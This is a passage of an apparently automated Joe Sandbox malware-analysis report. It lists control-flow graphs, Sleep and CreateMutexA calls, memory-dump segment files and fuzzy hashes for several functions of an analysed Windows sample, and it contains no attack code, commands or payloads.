                                                                                                                                                                                                                                        control_flow_graph 692 b89b49-b89b69 696 b89b6b-b89b77 692->696 697 b89b97-b89bb3 692->697 698 b89b79-b89b87 696->698 699 b89b8d-b89b94 call b9ecf8 696->699 700 b89be1-b89c00 697->700 701 b89bb5-b89bc1 697->701 698->699 704 b8a400 698->704 699->697 702 b89c2e-b8a3e6 call b99750 700->702 703 b89c02-b89c0e 700->703 706 b89bc3-b89bd1 701->706 707 b89bd7-b89bde call b9ecf8 701->707 709 b89c10-b89c1e 703->709 710 b89c24-b89c2b call b9ecf8 703->710 712 b8a423-b8a466 Sleep CreateMutexA 704->712 713 b8a400 call bb82fa 704->713 706->704 706->707 707->700 709->704 709->710 710->702 713->712
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 18363222cd4b0c4dd42647ae9882f8288c94f736497a6b414507be989c722c81
                                                                                                                                                                                                                                        • Instruction ID: 791a1d384dfa9845b5408d27f75b259105ce533c28955d6077ef36cd847dfb5f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18363222cd4b0c4dd42647ae9882f8288c94f736497a6b414507be989c722c81
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B43148717001449BEF18EB68DDC97ACB7E2DB85314F248698E424AB3E1C7799980CB51
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B89C7E Relevance: 3.1, APIs: 2, Instructions: 126sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 723 b89c7e-b89c9e 727 b89ccc-b89ce8 723->727 728 b89ca0-b89cac 723->728 729 b89cea-b89cf6 727->729 730 b89d16-b89d35 727->730 731 b89cae-b89cbc 728->731 732 b89cc2-b89cc9 call b9ecf8 728->732 733 b89cf8-b89d06 729->733 734 b89d0c-b89d13 call b9ecf8 729->734 735 b89d63-b8a3e6 call b99750 730->735 736 b89d37-b89d43 730->736 731->732 737 b8a405 731->737 732->727 733->734 733->737 734->730 740 b89d59-b89d60 call b9ecf8 736->740 741 b89d45-b89d53 736->741 743 b8a423-b8a466 Sleep CreateMutexA 737->743 744 b8a405 call bb82fa 737->744 740->735 741->737 741->740 744->743
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: a4e8ab8afc47586b52e26839b7256fce9d2ba1ecb426c609a3e29281034ada35
                                                                                                                                                                                                                                        • Instruction ID: 8dfaf68bb5cb394d8977957cdad528118f1c8bff41535a355cc732d7e6986210
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4e8ab8afc47586b52e26839b7256fce9d2ba1ecb426c609a3e29281034ada35
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 043128717101049BFF18EB78CD897ACBBE2DB85314F2486A8E424AB3E1D7759980CB55
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B89EE8 Relevance: 3.1, APIs: 2, Instructions: 124sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 754 b89ee8-b89f08 758 b89f0a-b89f16 754->758 759 b89f36-b89f52 754->759 762 b89f18-b89f26 758->762 763 b89f2c-b89f33 call b9ecf8 758->763 760 b89f80-b89f9f 759->760 761 b89f54-b89f60 759->761 768 b89fcd-b8a3e6 call b99750 760->768 769 b89fa1-b89fad 760->769 766 b89f62-b89f70 761->766 767 b89f76-b89f7d call b9ecf8 761->767 762->763 764 b8a40f 762->764 763->759 771 b8a414-b8a466 call bb82fa * 3 Sleep CreateMutexA 764->771 772 b8a40f call bb82fa 764->772 766->764 766->767 767->760 775 b89faf-b89fbd 769->775 776 b89fc3-b89fca call b9ecf8 769->776 772->771 775->764 775->776 776->768
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: c37a7b7fd0489127735fd693a5c8ad2f7705de98541ba093f4fe76b36b2d039c
                                                                                                                                                                                                                                        • Instruction ID: 25c0315b4a3502502e8a2d63385ebd2f5c07d23dadb2d430f5f9d7414ba778be
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c37a7b7fd0489127735fd693a5c8ad2f7705de98541ba093f4fe76b36b2d039c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 303126717001049BEF18EB78CD897ADB6E2DB85314F2482A8E121AB7E5DBB59980C751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B8A01D Relevance: 3.1, APIs: 2, Instructions: 123sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 791 b8a01d-b8a03d 795 b8a06b-b8a087 791->795 796 b8a03f-b8a04b 791->796 797 b8a089-b8a095 795->797 798 b8a0b5-b8a0d4 795->798 799 b8a04d-b8a05b 796->799 800 b8a061-b8a068 call b9ecf8 796->800 803 b8a0ab-b8a0b2 call b9ecf8 797->803 804 b8a097-b8a0a5 797->804 805 b8a102-b8a3e6 call b99750 798->805 806 b8a0d6-b8a0e2 798->806 799->800 801 b8a414-b8a466 call bb82fa * 3 Sleep CreateMutexA 799->801 800->795 803->798 804->801 804->803 811 b8a0f8-b8a0ff call b9ecf8 806->811 812 b8a0e4-b8a0f2 806->812 811->805 812->801 812->811
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
